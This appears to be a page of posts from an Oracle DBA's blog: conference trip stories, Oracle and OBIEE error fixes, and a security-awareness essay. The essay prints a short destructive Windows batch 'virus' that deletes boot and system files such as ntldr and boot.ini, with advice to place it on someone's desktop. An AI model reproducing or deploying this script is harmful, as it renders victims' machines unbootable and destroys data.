BLOG

BGOUG Autumn Conference – Extraordinary trip

it’s 19-Nov-2015 and this day means that i should start packing and prepare myself for traveling to Bulgaria, at first everything was normal and i thought it will be like any other trip i did before.

since there is no direct flight to Bulgaria then i should landed in Frankfurt first then to Sofia as most of you know i don’t like early flight despite i am waking all the night working or replying some emails but it’s something i don’t like to do 🙂 anyway my flight was at 3:00 am from Jordan i did boarding thing and visa & security Check after 6 hours i landed in Germany,drink coffee in the airport and ran to my next flight Sofia.

When i landed in Sofia it was 1:30 pm exactly, so like any other airport i should pass by immigration officer & this is what happened :-

Me :- Hi, Good afternoon.
officer : Hi, your passport please.
Me ; Sure.
Officer “Scan the visa” and the System start rining.
Me: is there something wrong.
Officer: mmmm come with me please.
Me “in my mind” did i do anything bad before i came here.
Officer : Your visa valid from tomorrow.
Me: Kidding right ? So what ?
Officer : you have to wait till 12:00 am then you access to Sofia.
Me : it’s almost 12 hours man.
Officer : it’s Ok you can go upstairs and have some drink and food if you want.
Me : Sure, i am gonna have more than this.

So i wait in the airport and during this i sent an email to Milena to inform her that i will not be available till 12:00 am and told her what is happened to me.

I would like to thanks all of them actually Milena, Heli and Gurcan  these guys was checking on me :).

Wait my story not end here, When i went out of security check now i have to start search of my luggage which i found it in Lost & found Department for more information about this part contact me 🙂

anyway the conference was really good i had two presentation about middleware with live demo, i don’t know why the live demo before the presentation working fine but during the presentation it stop working for stupid reasons but live demo is always challenge

everything was well organized  and conference was really amazing.

Safe Trip my friends 🙂 and meet you soon Inchallah.

Cheers
Osama 

Oracle Open World 2015 review

As all of you know Oracle open world 2015 finished before 2 days ago, and simply it’s was amazing, my trip started on OCT-21-2015 Wenseday and it’s was totally morning flight which mean i supposed to be in airport at 4:00 am because of to avoid miss my flight i didn’t sleep, the flight was from Jordan – Amman to Turkey – IST and then to SF, when i landed in IST i met my old friend Gurcan Orhan this man is awesome, he managed everything from our seats to waiting in the lounge but i have to say he spent 11 hours sleeping from IST- SF. meanwhile i was watching San Andres movie which i discovered later it was bad idea , in case you didn’t watch it’s movie talking about earthquake happened in San Francisco, actually i watched all the entertainment movie and i was thinking what i will go when i will be back home ? simply i watch San Andres again.

anyway we landed after 13 hours of flying and we met the great Tim Hall the great oracle guy i am sure this man is helping a lot of DBA with his amazing blog. so we took the shuttle “tim, Gurcan, Arup,cary , simon and me”.

Don’t forget this is was my first OOW15 as ACED :), so i attended ACED Breifing and meet my old friends there, during the two days i learnt alot of new things about Oracle that i can’t mention it here because the NDA, and i want to thanks Oracle ACE program to organizing all this and make it true so let’s skip this part.
OOW15 started on sunday with an amazing weather, attending session about RAC, Database just like arup said ” there is database and everything else” and sure the middleware sessions.
I had so much fun & learning, the funny thing that i met Deiby and nassyam for the first time and these guys are simply funny and crazy 🙂 i think we can be called the four musketeers “Me, Alex Zaballa, Deiby and Nassyam”
Let’s not forget the amazing friend all over the world such as : Bobby, Danny Bryant, Kellyn, Heli,  Steve , Kevin ,Mahir, kamran, sai ram, Joel and a lot of amazing people and friends but i can’t feel my fingers 🙂 
Also The ACE dinner on Sunday night was awesome,almost all the ACE’s in one place and we had so much there, in OOW I lost twice with F1 Simulation but i want one of these machine anyway.

and i noticed that i am not good at all when i am eating spicy food i spent my time like the following  one hand drink water the other one wiping my tears. thanks for Sai , Nassyam and Hariharaputhran.

there is so much to say about OOW15 but this is as quick review for it and if you have any more question about it you can ask me 🙂
Thanks 
Osama

Oracle Open World 2015 –> 12c is calling

Another Year means another Oracle open world but this time 2015, if you attend OOW14 then you will remember EOUC 12 Short talks on 12c i am so glad i have been chosen to do it again this year

the session called : More Than Another 12 on Oracle Database 12c [UGF3190]

and 12 of the  best Oracle ACE director will present and speak about oracle 12c if you will be there come and join us let’s talk 🙂

The Speakers :-

Jonathan Lewis                     Less well-known enhancements of the 12c Optimizer
Julian Dontcheff                   Oracle Database 12c In-Memory Advisor
Gurcan Orhan                       Adapting DB 12C In-Memory to ODI 12c
Osama Mustafa                     How to plugin a non-CDB database to a Container Database (CDB)
Bjoern Rost                           How ASM has reached maturity in 12c
Alex Nuijten                         Security Enhancements in PL/SQL or “JSON in the database”
Brendan Tierney                   Running R in the Database using Oracle R Enterprise
Douwe Pieter van den Bos     Maximum security architecture
Christian Antognini               Real-time Monitoring of Composite Database Operations
Martin Widlake                     12C – Clustered Data aware TABLE_CACHED_BLOCKS        
Heli Helskyaho                      Design your 12c Databases using Oracle SQL Dev Data Modeler
Oded Raz                              Oracle 12c Privileges Analysis

Error : Cannot export Display Linux

There are different tools to do X11 forwarding on Windows one of them Xming it’s small software and very easy to use no need to do any special configuration only run the installation file.

But sometimes you are using this application and try to run the GUI on your desktop or laptop it’s working like you excepted, one simple solution to solve it.

I am using as ssh client Putty, before put the server ip from putty left panel

  • Connection > SSH > X11
  • Check X11 forwarding: [x] Enable X11 forwarding
  • Add to the “X display location” field: localhost:0.0
Cheers
Osama

ORA-01502 index or partition of such index is in unusable state

The following error appeared on application side while trying to deploy the new SRF on the application, as you see from the above error it’s database error and to solve it follow the below steps :-

from database side :-

sqlplus /as sysdba

From the above picture check the index name and put it inside this query :-

select owner,index_name,table_name,status from dba_indexes where index_name=’index_name’;

OWNER    INDEX_NAME    TABLE_NAME    STATUS
—–    ———-    ———-    ——
owner    index_name     table_name    INVALID

alter index ndex_name rebuild;

Try again

Cheers
Osama 

ORA-00845: MEMORY_TARGET not supported on this system

SQL> alter system set memory_max_target=2GB scope=spfile;
System altered.
SQL> alter system set memory_target=2GB scope=spfile;
System altered.

 SQL> startup ;

ORA-00845: MEMORY_TARGET not supported on this system

Check the following Space :-

ECATSTDB oracle: :/home/oracle\>df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/Oracle-LogVol00
                       20G  3.3G   15G  18% /
/dev/mapper/Oracle-LogVol02
                       90G   45G   41G  53% /Oracle
/dev/sda1              99M   18M   77M  19% /boot
tmpfs                 3.0G     0  3.0G   0% /dev/shm

Increase the space

mount -t tmpfs shmfs -o size=6144m /dev/shm

now startup the database.

Cheers
Osama

System is in manitance mode. Please try again later OBIEE

When trying to update any reports in OBIEE the below errors appears :-

to solve this issue just follow the screen :-

1- Access to OBIEE Link http://ip-hostname:9704/analytics
2- Choose Administration from the upper right corner.

3- Turn Maintenance mode to off by press the link.

Good Luck.

Cheers
Osama

Me, Security & Oracle

Lot of question came to my mind when I start talking about oracle security, How to secure my databases, what should I do?
Adding Firewall to my network is it enough? Enable Oracle Audit Parameter will be enough?
Understand Security as concept is very important to reduce risk of attack and to do that you should make your system is secure.
Having Security awareness is first step to secure the system.

According to RSA reports, there was 7% increase in amount of phishing attacks worldwide between months of July and August 2010, The United States currently leads as the country that suffered the most attacks in regards to online cyber threats with 35% of these aimed at citizens of the US; the US was also the country that hosted the most attacks, with 60% of phishing attacks starting from the US.
The below Graph Show Number of network Security Breaches over Past 12 months (Graph Made by Ponemon Institute)
Included to above reports 1$ trillion the total value of intellectual property hackers stole from business around the world in 2008.
As proof for this I will mention three different stories for the biggest top “black hat” hackers
The below Graph Shown How much Did the Cyber-attack Cost Company over 12 month (Graph Made by Ponemon Institute)
Jonathan James when he hacked NASA he was 16 years old with that he was the first juvenile sent to the present, Installed backdoor into defense threats reductions agency server and  jacked into NASA Computers stealing software worth 1.7M $ Costing NASA 41,000$ in Repair.
Adrian Lamo Hacked into NY Times and Microsoft using wifi Coffee shop, Viewed Personal Information and High profile Subject matter
The last example Kevin Mitnick spent two years stealing corporate secrets and breaking into the US national defense warning system.
Computer Hacking is usually used as stereotypes in movies and cartoons as Guy sitting behind desk with Pepsi Can and not that much luck with ladies , the truth is this guy cost people and companies money and privacy, therefor the hacking effects on individuals , organizations and company.
As individuals victims of computer hacking will lose their saving, privacy even their life, in the early days of computer the virus was the biggest security risk which is cause data losing. After that it’s replaced with malware which is small software designed to do job such as key logger or virus scanner but now this software not more any fun since the hackers now creating malware.
Nothing easier today than writing virus just to do annoying things, the below code just an example how writing a virus.
You can find step to write virus, Trojan or even worm on the internet and for free, this is what makes problem bigger, because internal user can read this information and start using them so you should prepare to all these kind of attacks.
The below example for simple virus, all you have to do is save as batch file and put it on someone desktop

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
msg * SEND->> JOIN EVILKING TO +962795238146 for hacking tricks

 What if the victims was company or organization, the small effect could happened by hacker is put some employees out of works for short period of time. The large affect hacker could stole company secrets and lose them data, and make some damage, the last survey for Ponemon Research on behalf of juniper Networks 90% of companies had been breached at least once by hackers over the past 12 months.60% reported two or more breaches over the past year.

So companies or organizations should spend small fortune for security purpose software and hardware and lets us don’t forget to educate our employee.
The Security today consider as most important priority for the company for two reasons:
1-      Personal Data protections.
If you store data you should secure these data, since it’s related to customers or clients.
2-      Social Responsibility. 

Some of these data very important and contain people privacy which indicate us that company should protect these information by secure their systems.
When you leave your house for works purpose in the morning or hanging out with friends in the evening you make sure that your house is secure why? All this to keep unauthorized people to access, damage and theft By enable alarm system, make sure your doors is lock and even your windows, this is the same for the companies or organizations same principle but with different approach, the valuable things in the computers and networks is the data you create, this is the first reasons why we have computers and networks. 
Operating system can be reinstalled, Hardware can be replaced but we talking about data which is unique and sometimes it is irreplaceable.
Data is confidential and people privacy, this is the main reason why you don’t want lose it, you don’t want others to even view it without authorization , Visa information, mobile numbers, social numbers and account numbers.
If it’s left unprotected then information can be accessed by anyone, if these information fall into wrong hand, you’re live is nightmare, quite often ensure your data is protected is small price that you could pay to avoid future problems and prevent threats.
What if the data is not adequately protected, perhaps it compromised which called security breach, I am not talking here as individual level but as Business level that cause problems such as loss of reputation and lawsuits.
According to the Ponemon institute, cost of a Security breach during 2008 was $202 per record breached. Imagine if you have 1 Million records what is could cause to the company?
Intruders not care who you are or about your identity they just want to control your computer. By doing this they can hide their location and start attack.
By access to the system intruders discovers new vulnerabilities to exploit in computer software, don’t forget its networks which mean you can access to another computers on same network Complex right?
But what about the law, all the above information is just reports and security principle, check the below law that talks about security and data privacy.
Cheers
Osama Mustafa

Presentation will be

There is no much left for 2015 but there is too much work waiting me, presenting in different country means a lot of work and preparation, i am still waiting different events but till now this is confirmed:-

  • SIOUG2015 — Located In Slovenia.
  • HROUG2015 — Located in Croatia 
  • OOW15 — Located in SF, USA
  • UKOUG TECH15 — Located in UK.

So Excited.

Cheers
Osama Mustafa